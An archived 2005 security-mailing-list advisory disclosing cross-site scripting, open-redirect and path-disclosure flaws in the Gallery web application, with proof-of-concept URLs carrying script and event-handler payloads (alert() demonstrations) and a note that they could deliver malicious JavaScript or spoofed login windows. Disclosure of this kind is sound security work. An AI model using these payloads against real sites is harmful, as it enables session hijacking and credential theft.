Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security VulnWatch
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

[Full-Disclosure] Gallery v1.3.4-pl1, v1.4.4-pl2, 2.0 Alpha Cross Site S

from [Rafel Ivgi, The-Insider] Network Security [Permanent Link]
Subject: [Full-Disclosure] Gallery v1.3.4-pl1, v1.4.4-pl2, 2.0 Alpha Cross Site Scripting Vulnerability
Date: Mon, 17 Jan 2005 22:34:43 +0200 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application:    Gallery
Vendors:        http://gallery.sourceforge.net
Versions:       v1.3.4-pl1, v1.4.4-pl2, 2.0 Alpha
Platforms:      Windows
Bug:              Cross Site Scripting Vulnerability
Exploitation:   Remote With Browser
Date:             17 Jan 2005
Author:          Rafel Ivgi, The-Insider
E-Mail:          the_insider@mail.com
Website:        http://theinsider.deep-ice.com

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

1) Introduction
2) Bugs
3) The Code

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

===============
1) Introduction
===============

Gallery is open to Cross Site Scripting vulnerability, allowing a remote
attacker to inject and execute scripts on the user’s machine while visiting
a remote gallery.


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

======
2) Bug
======

Gallery v1.3.4-pl1 contain a vulnerability inside ‘add_comment.php’ in the
‘index’ field. The injection can be done using the classical tag closing:
"><script>alert()</script>

For Example:
http://<valid host>/gallery/add_comment.php?set_albumName=Eros&index=1">
<script>alert()</script>


Gallery v1.3.4-pl1 also contains vulnerability inside ‘slideshow_low.php’
in ALL the fields. The ‘slideshow_low.php’ contains the following form
fields:
set_albumName
slide_index
slide_full
slide_loop
slide_pause
slide_dir

The injection can be done using the classical tag closing:
"><script>alert()</script>

For Example:
http://<valid host>/gallery/slideshow_low.php?set_albumName=A-Or&slide_
index=3&slide_full=0"><script>alert()</script>&slide_loop=0&slide_pause=3&sl
ide_dir=1

Yet there is Gallery v1.3.4-pl1 vulnerability inside ‘search.php’ in the
‘username’ field. The injection can be done using hex encoded tag closing
and an HTML event:
%22%20onactivate%3D"alert%28%29"

For Example:
http://<valid
host>/gallery/search.php?searchstring=%22%20onactivate%3D"alert%28%29"



Gallery v1.4.4-pl2 contains vulnerability inside ‘login.php’ in the
‘username’ field.
The injection can be done using hex encoded tag closing and an HTML event:
%22%20onactivate%3D"alert%28%29"
http://<valid host>/gallery/login.php?gallery_popup=true&username=/*%22*/%20
onactivate%3Dalert%28%29%3e
This version of Gallery also has an open redirection, which is a security
risk because
an attacker can send someone a link with a redirection to his evil host name
or to cause
the user to commit an attack or waste a target’s resources.

For Example:
http://<valid host>/gallery/do_command.php?set_fullOnly=on&return=<escape
encoded evil
host name>&cmd= All the vulnerabilities described above can be used to
remotely call
a JavaScript file The injected JavaScript code is responsible for:
Automatic launching of malicious code (remote compromise by I.E exploits).
Identity theft using a spoofed re-login window (only for galleries with
login)

Gallery v2.0 Alpha contains vulnerability inside ‘login.php’ in the
‘g2_form[subject]’
field. The injection can be done using an inline javascript protocol call:
javascript:alert()

For Example:
http://<valid host>/g2/main.php?g2_controller=comment:AddComment&g2
_form[formName]=AddComment&g2_itemId=<valid
item>&g2_form[subject]=[img]javascript:alert
()[/img]&g2_form[action][preview]=preview

Gallery v2.0 Alpha contains another vulnerability inside ‘main.php’ in the
‘g2_subView’ parameter. It is possible the replace any valid subView value
such as: comment
:ShowComments with the admin value: core:UserAdmin. This causes the gallery
to wait 30 seconds
and then print out the Full Path of the gallery on the server.

For Example:
http://<valid host>/g2/main.php?g2_return= http://<valid
host>/main.php%3Fg2_view%3Dcore
%3AShowItem%26g2_itemId%3D7150%26g2_GALLERYSID%3D< any valid/invalid session
id such as:
be869b98355e8d445c8ec8f97cb343da>&g2_view=core:UserAdmin&amp;g2_subView=core
:UserAdmin

Then the following data will be printed out to the attacker:
Fatal error: Maximum execution time of 30 seconds exceeded in
/mnt/1/<name>/www/<host>/g2/
modules/core/UserAdmin.inc on line 55

Second Time
Fatal error: Maximum execution time of 30 seconds exceeded in
/mnt/1/<name>/www/<host>/g2/
modules/core/classes/GalleryUtilities.class on line 596

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

===========
3) The Code
===========

Gallery v1.3.4-pl1
http://<host>/gallery/add_comment.php?set_albumName=Eros&index=1"><script>al
ert()</script>
http://<host>/gallery/slideshow_low.php?set_albumName=A-Or&slide_index=3"><s
cript>alert()</script>&slide_full=0&slide_loop=0&slide_pause=3&slide_dir=1
http://<host>/gallery/slideshow_low.php?set_albumName=A-Or&slide_index=3&sli
de_full=0"><script>alert()</script>&slide_loop=0&slide_pause=3&slide_dir=1
http://<host>/gallery/slideshow_low.php?set_albumName=A-Or&slide_index=3&sli
de_full=0&slide_loop=0"><script>alert()</script>&slide_pause=3&slide_dir=1
http://<host>/gallery/slideshow_low.php?set_albumName=A-Or&slide_index=3&sli
de_full=0&slide_loop=0&slide_pause=3"><script>alert()</script>&slide_dir=1
http://<host>/gallery/slideshow_low.php?set_albumName=A-Or&slide_index=3&sli
de_full=0&slide_loop=0&slide_pause=3&slide_dir=1"><script>alert()</script>
http://<host>/gallery/search.php?searchstring=%22%20onclick%3D"alert%28%29"

Gallery v1.4.4-pl2
http://<host>/gallery/login.php?gallery_popup=true&cool=rafi&username=/*%22*
/%20onactivate%3Dalert%28%29%3e<plaintext>
http://<host>/gallery/do_command.php?set_fullOnly=on&return=http%3A%2F%2Fwww
.google.com&cmd=

Gallery v2.0 Alpha

1)  http://<valid host>/g2/main.php?g2_controller=comment:AddComment&g2
 _form[formName]=AddComment&g2_itemId=<valid
item>&g2_form[subject]=[img]javascript:alert()[/img]&g2_form[action][preview
]=preview

2)
http://<host>/g2/main.php?g2_return=<host>%2Fg2%2Fmain.php%3Fg2_view%3Dcore%
3AShowItem%26g2_itemId%3D7150%26g2_GALLERYSID%3Dbe869b98355e8d445c8ec8f97cb3
43da%5C%5C0%5C%5C00%5C%5C%5C%5C0%5C%5C%5C%5C00%3B%250a%250d%250a%250drafi&am
p;g2_view=core:UserAdmin&amp;g2_subView=core:UserAdmin



~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

---
Rafel Ivgi, The-Insider
http://theinsider.deep-ice.com

"Scripts and Codes will make me D.O.S , but they will never HACK me."

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
[More with this subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • [Full-Disclosure] Gallery v1.3.4-pl1, v1.4.4-pl2, 2.0 Alpha Cross Site Scripting Vulnerability, Rafel Ivgi, The-Insider <=
Previous by Date:  [VulnWatch] iDEFENSE Security Advisory 01.17.05: Multiple Vendor ImageMagick .psd Image File Decode Heap Overflow Vulnerability, customer service mailbox
Next by Date:  [Full-Disclosure] Kazaa Sig2Dat Protocol Remote Integer Overflow and Denial Of Service by creating files in arbitrary locations, Rafel Ivgi, The-Insider
Previous by Thread:  [VulnWatch] iDEFENSE Security Advisory 01.17.05: Multiple Vendor ImageMagick .psd Image File Decode Heap Overflow Vulnerability, customer service mailbox
Next by Thread:  [Full-Disclosure] Kazaa Sig2Dat Protocol Remote Integer Overflow and Denial Of Service by creating files in arbitrary locations, Rafel Ivgi, The-Insider
Indexes:  [Date] [Thread] [Top] [All Lists]